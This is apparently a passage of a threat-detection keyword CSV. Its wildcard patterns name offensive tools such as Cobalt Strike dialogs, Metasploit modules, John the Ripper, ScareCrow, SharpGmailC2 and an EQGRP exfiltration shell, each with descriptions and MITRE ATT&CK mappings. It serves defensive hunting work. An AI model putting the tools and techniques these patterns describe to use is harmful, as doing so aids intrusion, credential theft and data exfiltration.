T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*opencubicles/h8mail*,offensive_tool_keyword,h8mail,Powerful and user-friendly password hunting tool.,T1581.002 - T1591 - T1590 - T1596 - T1592 - T1217.001,TA0010,N/A,N/A,Information Gathering,https://github.com/opencubicles/h8mail,1,1,N/A,N/A,1,9,5,2019-08-19T09:46:33Z,2019-08-19T09:45:32Z -*OPENCYBER-FR/RustHound*,offensive_tool_keyword,RustHound,Active Directory data collector for BloodHound written in Rust,T1087.002 - T1018 - T1059.003,TA0007 - TA0001 - TA0002,N/A,N/A,AD Enumeration,https://github.com/OPENCYBER-FR/RustHound,1,1,N/A,9,7,676,56,2023-08-31T08:35:38Z,2022-10-12T05:54:35Z 
-*openGoldenTicketDialog*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*openKeystrokeBrowser*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - 
T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*openPayloadGenerator*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Python API,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/dcsync/pycobalt,1,1,N/A,10,10,290,58,2022-01-27T07:31:36Z,2018-10-28T00:35:38Z -*openPayloadGeneratorDialog*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - 
T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*openPayloadHelper*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens 
- Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*openPortScanner*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Python API,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/dcsync/pycobalt,1,1,N/A,10,10,290,58,2022-01-27T07:31:36Z,2018-10-28T00:35:38Z -*openPortScanner*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - 
T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*openSpearPhishDialog*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*openssl_heartbleed.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. 
It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*openssl2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*OpenVAS*,offensive_tool_keyword,openvas,Vulnerability scanner,T1046 - T1068 - T1190 - T1201 - T1222 - T1592,TA0001 - TA0002 - TA0007 - TA0011,N/A,N/A,Vulnerability scanner,https://www.openvas.org/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*openwall.John.appdata.xml*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*openwall.John.desktop*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*openwall/john*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential 
Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*openWindowsExecutableStage*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*opera* --headless * --dump-dom http*,greyware_tool_keyword,chromium,Headless Chromium allows running Chromium in a headless/server environment - downloading a file - abused by attackers,T1553.002 - T1059.005 - T1071.001 - T1561,TA0002,N/A,N/A,Defense Evasion,https://redcanary.com/blog/intelligence-insights-june-2023/,1,0,N/A,4,5,N/A,N/A,N/A,N/A -"*opera.exe* --load-extension=""*\Users\*\Appdata\Local\Temp\*",greyware_tool_keyword,chromium,The --load-extension switch allows the source to specify a target directory to load as an extension. 
This gives malware the opportunity to start a new browser window with their malicious extension loaded.,T1136.001 - T1176 - T1059.007,TA0003 - TA0004 - TA0005,N/A,N/A,Exploitation tools,https://www.mandiant.com/resources/blog/lnk-between-browsers,1,0,risk of false positives,7,10,N/A,N/A,N/A,N/A -*Operative Framework*,offensive_tool_keyword,Operative Framework,Framework based on fingerprint action. this tool is used for get information on a website or a enterprise target with multiple modules.,T1590 - T1591 - T1592 - T1593 - T1594 - T1595,TA0007 - TA0011 - TA0007,N/A,N/A,Frameworks,https://github.com/graniet/operative-framework,1,0,N/A,N/A,7,634,180,2023-05-12T06:20:09Z,2017-01-03T08:38:59Z -*ophcrack*,offensive_tool_keyword,ophcrack,Windows password cracker based on rainbow tables.,T1110.003 - T1555.003 - T1110.001,TA0006 - TA0008,N/A,N/A,Credential Access,https://gitlab.com/objectifsecurite/ophcrack,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*optiv/Ivy.git*,greyware_tool_keyword,ivy,Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory,T1059.005 - T1027 - T1055.005 - T1140,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/optiv/Ivy,1,1,N/A,10,8,726,127,2023-08-18T17:30:14Z,2021-11-18T18:29:20Z -*optiv/Registry-Recon*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Aggressor Script that Performs System/AV/EDR Recon,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - 
T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/optiv/Registry-Recon,1,1,N/A,10,10,314,36,2022-06-06T14:39:12Z,2021-07-29T18:47:23Z -*optiv/ScareCrow*,offensive_tool_keyword,cobaltstrike,ScareCrow - Payload creation framework designed around EDR bypass.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/optiv/ScareCrow,1,1,N/A,10,10,2580,458,2023-08-18T17:16:06Z,2021-01-25T02:21:23Z -*optiv/ScareCrow*,offensive_tool_keyword,ScareCrow,ScareCrow - Payload creation framework designed around EDR bypass.,T1548 - T1562 - T1027,TA0002 - TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/optiv/ScareCrow,1,1,N/A,N/A,10,2580,458,2023-08-18T17:16:06Z,2021-01-25T02:21:23Z 
-*oracle_default_hashes.txt*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*oracle_default_passwords.csv*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*orbitaldump.py*,offensive_tool_keyword,orbitaldump,A simple multi-threaded distributed SSH brute-forcing tool written in Python.,T1110,TA0006,N/A,N/A,Exploitation tools,https://github.com/k4yt3x/orbitaldump,1,1,N/A,N/A,5,440,86,2022-10-30T23:40:57Z,2021-06-06T17:48:19Z -*orbitaldump/orbitaldump*,offensive_tool_keyword,orbitaldump,A simple multi-threaded distributed SSH brute-forcing tool written in Python.,T1110,TA0006,N/A,N/A,Exploitation tools,https://github.com/k4yt3x/orbitaldump,1,1,N/A,N/A,5,440,86,2022-10-30T23:40:57Z,2021-06-06T17:48:19Z -*OrderFromC2 = ReadEmail()*,offensive_tool_keyword,SharpGmailC2,Gmail will act as Server and implant will exfiltrate data via smtp and will read commands from C2 (Gmail) via imap protocol,T1071 - T1071.004 - T1568 - T1568.002 - T1114 - T1114.001,TA0011 - TA0040 - TA0001,N/A,N/A,C2,https://github.com/reveng007/SharpGmailC2,1,0,N/A,10,10,242,40,2022-12-27T01:45:46Z,2022-11-10T06:48:15Z -*os.execute(*/bin/*nmap --script=$*,greyware_tool_keyword,nmap,Nmap Privilege Escalation,T1548.002 - T1059 - T1068,TA0002,N/A,N/A,Privilege Escalation,https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md,1,0,N/A,N/A,9,890,121,2023-10-03T19:54:40Z,2021-08-16T17:34:25Z -*OS-Command-Injection-Unix-Payloads.*,offensive_tool_keyword,Offensive-Payloads,List of payloads and wordlists that are specifically crafted to identify and exploit vulnerabilities in target web applications.,T1210 - T1185 - T1059 - T1400 - T1506 - T1213 ,TA0001 - TA0002 - 
TA0009,N/A,N/A,List,https://github.com/InfoSecWarrior/Offensive-Payloads/,1,1,N/A,N/A,2,116,43,2023-09-11T17:20:51Z,2022-11-18T09:43:41Z -*OS-Command-Injection-Windows-Payloads.*,offensive_tool_keyword,Offensive-Payloads,List of payloads and wordlists that are specifically crafted to identify and exploit vulnerabilities in target web applications.,T1210 - T1185 - T1059 - T1400 - T1506 - T1213 ,TA0001 - TA0002 - TA0009,N/A,N/A,List,https://github.com/InfoSecWarrior/Offensive-Payloads/,1,1,N/A,N/A,2,116,43,2023-09-11T17:20:51Z,2022-11-18T09:43:41Z -*OSCP-Archives*,offensive_tool_keyword,OSCP-Archives,resources for red teamers 'During my journey to getting the OSCP. I always come across many articles. Git repo. videos. and other types of sources of great and valuable information that helps me during my studies. While having all of these in a bookmark folder is great. I wanted to also build a curated list of the resources that I've collected overtime. all in one area for everyone to access.',T1593 - T1592 - T1596,TA0001 - TA0043 - ,N/A,N/A,Exploitation tools,https://github.com/CyDefUnicorn/OSCP-Archives,1,1,N/A,N/A,7,601,196,2020-09-14T13:01:57Z,2018-09-15T16:18:05Z -*osmedeus cloud*,offensive_tool_keyword,Osmedeus,Osmedeus - A Workflow Engine for Offensive Security,T1595,TA0043,N/A,N/A,Exploitation Tools,https://github.com/j3ssie/osmedeus,1,0,N/A,N/A,10,4712,845,2023-09-16T05:02:26Z,2018-11-10T04:17:18Z -*osmedeus health*,offensive_tool_keyword,Osmedeus,Osmedeus - A Workflow Engine for Offensive Security,T1595,TA0043,N/A,N/A,Exploitation Tools,https://github.com/j3ssie/osmedeus,1,0,N/A,N/A,10,4712,845,2023-09-16T05:02:26Z,2018-11-10T04:17:18Z -*osmedeus provider*,offensive_tool_keyword,Osmedeus,Osmedeus - A Workflow Engine for Offensive Security,T1595,TA0043,N/A,N/A,Exploitation Tools,https://github.com/j3ssie/osmedeus,1,0,N/A,N/A,10,4712,845,2023-09-16T05:02:26Z,2018-11-10T04:17:18Z -*osmedeus scan*,offensive_tool_keyword,Osmedeus,Osmedeus - A Workflow Engine for 
Offensive Security,T1595,TA0043,N/A,N/A,Exploitation Tools,https://github.com/j3ssie/osmedeus,1,0,N/A,N/A,10,4712,845,2023-09-16T05:02:26Z,2018-11-10T04:17:18Z -*osmedeus utils*,offensive_tool_keyword,Osmedeus,Osmedeus - A Workflow Engine for Offensive Security,T1595,TA0043,N/A,N/A,Exploitation Tools,https://github.com/j3ssie/osmedeus,1,0,N/A,N/A,10,4712,845,2023-09-16T05:02:26Z,2018-11-10T04:17:18Z -*osx/dump_keychain*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*osx_gatekeeper_bypass.*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. 
By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*OtterHacker/SetProcessInjection*,offensive_tool_keyword,SetProcessInjection,alternate technique allowing execution at an arbitrary memory address on a remote process that can be used to replace the standard CreateRemoteThread call.,T1055 - T1055.008 - T1055.001 - T1055.002 - T1055.012,TA0005 - TA0004 - TA0002,N/A,N/A,Defense Evasion,https://github.com/OtterHacker/SetProcessInjection,1,1,N/A,9,1,53,10,2023-10-02T09:23:42Z,2023-10-02T08:21:47Z -*ourtn-ftshell-upcommand*,offensive_tool_keyword,EQGRP tools,Equation Group hack tool leaked by ShadowBrokers- from files ftshell File transfer shell,T1055 - T1036 - T1038 - T1203 - T1059,TA0002 - TA0003 - TA0008,N/A,N/A,Data Exfiltration,https://github.com/Artogn/EQGRP-1/blob/master/Linux/bin/ftshell.v3.10.2.1,1,0,N/A,N/A,1,0,1,2017-04-10T05:02:35Z,2017-04-10T06:59:29Z -*-out*.exe -r:*System.Drawing.dll*System.Management.Automation*.dll*,offensive_tool_keyword,ThunderShell,ThunderShell is a C# RAT that communicates via HTTP requests. All the network traffic is encrypted using a second layer of RC4 to avoid SSL interception and defeat network detection on the target system. RC4 is a weak cipher and is used to help obfuscate the traffic. 
